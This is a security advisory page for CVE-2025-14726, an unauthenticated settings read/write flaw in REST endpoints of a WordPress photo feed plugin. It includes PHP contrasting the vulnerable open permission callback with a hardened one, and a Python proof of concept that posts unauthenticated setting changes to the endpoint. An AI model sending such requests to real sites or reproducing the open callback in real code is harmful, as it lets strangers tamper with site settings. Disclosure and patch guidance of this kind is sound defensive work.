Security Vulnerability Report
CVE-2025-14726 CVSS 6.5 MEDIUM

CVE-2025-14726

Published: 2026-05-02 05:16:00
Last Modified: 2026-05-05 19:17:23

Description

The Widgets for Social Photo Feed plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the '/trustindex_feed_hook_instagram/troubleshooting' and '/trustindex_feed_hook_instagram/submit-data' REST API endpoints in all versions up to, and including, 1.8. This makes it possible for unauthenticated attackers to access and update plugin settings.
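The root cause described above is a WordPress REST route whose permission check lets anonymous clients through. The following PHP is an added illustration of that bug class and of the corresponding fix; it is not the Widgets for Social Photo Feed plugin's own code. Only the route namespace and the two route paths come from the advisory; the `tifh_example_*` function and option names, the `manage_options` capability, and the accepted parameters are assumptions made for the example.

```php
<?php
/**
 * Illustrative example, NOT the plugin's source. Shows a REST route that
 * anyone can call (the class of bug in the advisory) beside a hardened
 * registration that enforces a capability and constrains the input.
 * Namespace/paths are from the advisory; everything else is assumed.
 */

// --- Vulnerable pattern (not hooked here, shown for contrast) -----------------
function tifh_example_register_vulnerable() {
    register_rest_route( 'trustindex_feed_hook_instagram', '/troubleshooting', array(
        'methods'             => WP_REST_Server::READABLE,   // GET
        'callback'            => 'tifh_example_troubleshooting',
        // '__return_true' grants access to every caller, including anonymous
        // ones: this is the "missing capability check".
        'permission_callback' => '__return_true',
    ) );
    register_rest_route( 'trustindex_feed_hook_instagram', '/submit-data', array(
        'methods'             => WP_REST_Server::CREATABLE,  // POST
        'callback'            => 'tifh_example_submit_data',
        'permission_callback' => '__return_true',
    ) );
}

// --- Hardened pattern -----------------------------------------------------------
function tifh_example_can_manage( WP_REST_Request $request ) {
    // Admin-only. WordPress answers 401 for an anonymous client and 403 for a
    // logged-in user lacking the capability (rest_authorization_required_code()).
    if ( ! current_user_can( 'manage_options' ) ) {
        return new WP_Error(
            'rest_forbidden',
            __( 'Sorry, you are not allowed to do that.' ),
            array( 'status' => rest_authorization_required_code() )
        );
    }
    return true;
}

function tifh_example_register_hardened() {
    register_rest_route( 'trustindex_feed_hook_instagram', '/troubleshooting', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'tifh_example_troubleshooting',
        'permission_callback' => 'tifh_example_can_manage',
    ) );
    register_rest_route( 'trustindex_feed_hook_instagram', '/submit-data', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'tifh_example_submit_data',
        'permission_callback' => 'tifh_example_can_manage',
        // Declare the accepted parameters so WordPress rejects anything else
        // before the callback runs. The option names here are assumed.
        'args'                => array(
            'option_name'  => array(
                'required' => true,
                'type'     => 'string',
                'enum'     => array( 'tifh_example_feed_layout', 'tifh_example_cache_ttl' ),
            ),
            'option_value' => array(
                'required'          => true,
                'type'              => 'string',
                'sanitize_callback' => 'sanitize_text_field',
            ),
        ),
    ) );
}
add_action( 'rest_api_init', 'tifh_example_register_hardened' );

function tifh_example_troubleshooting( WP_REST_Request $request ) {
    // Diagnostic data that should only be visible to administrators.
    return rest_ensure_response( array(
        'php_version' => PHP_VERSION,
        'wp_version'  => get_bloginfo( 'version' ),
    ) );
}

function tifh_example_submit_data( WP_REST_Request $request ) {
    // Only names from the enum above reach this point, so arbitrary wp_options
    // rows cannot be written through this endpoint.
    update_option( $request['option_name'], $request['option_value'] );
    return rest_ensure_response( array( 'updated' => $request['option_name'] ) );
}
```

Since WordPress 5.5, omitting `permission_callback` entirely triggers a `_doing_it_wrong` notice, so this bug class usually surfaces as an explicit `'__return_true'` (or a callback that returns true unconditionally) rather than a missing key. After patching, an unauthenticated `GET /wp-json/trustindex_feed_hook_instagram/troubleshooting` should return HTTP 401 with a `rest_forbidden` error body rather than 200.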

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

NVD lists no CPE configuration data for this entry. Affected range, from the description:

WordPress Widgets for Social Photo Feed <= 1.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL of one of the two affected endpoints (the advisory also names
# '/trustindex_feed_hook_instagram/troubleshooting', which is a read).
# Neither endpoint enforced a capability check in versions <= 1.8.
target_url = "http://example.com/wp-json/trustindex_feed_hook_instagram/submit-data"

# Payload intended to modify plugin settings. The field names below are
# placeholders: the advisory does not document the request parameters, so
# take the real ones from the plugin source (see the changeset in References).
payload = {
    "option_name": "some_plugin_option",
    "option_value": "malicious_value",
}

try:
    # Send the request with no cookies or nonce, i.e. as an anonymous client.
    response = requests.post(target_url, json=payload, timeout=10)

    # A 200 means the endpoint accepted the unauthenticated write.
    # A patched site answers 401 (anonymous) with a 'rest_forbidden' error body.
    if response.status_code == 200:
        print("[+] Endpoint accepted the unauthenticated request (vulnerable)")
        print("[+] Response from server:", response.text)
    elif response.status_code in (401, 403):
        print(f"[-] Access denied ({response.status_code}); capability check present")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] An error occurred: {e}")
```

References

https://plugins.trac.wordpress.org/changeset/3513612/social-photo-feed-widget
https://www.wordfence.com/threat-intel/vulnerabilities/id/ab15fa8b-4072-435a-8a1c-ca6fd964a260?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14726", "sourceIdentifier": "[email protected]", "published": "2026-05-02T05:16:00.093", "lastModified": "2026-05-05T19:17:22.860", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Widgets for Social Photo Feed plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the '/trustindex_feed_hook_instagram/troubleshooting' and '/trustindex_feed_hook_instagram/submit-data' REST API endpoints in all versions up to, and including, 1.8. This makes it possible for unauthenticated attackers to access and update plugin settings."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3513612/social-photo-feed-widget", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ab15fa8b-4072-435a-8a1c-ca6fd964a260?source=cve", "source": "[email protected]"}]}}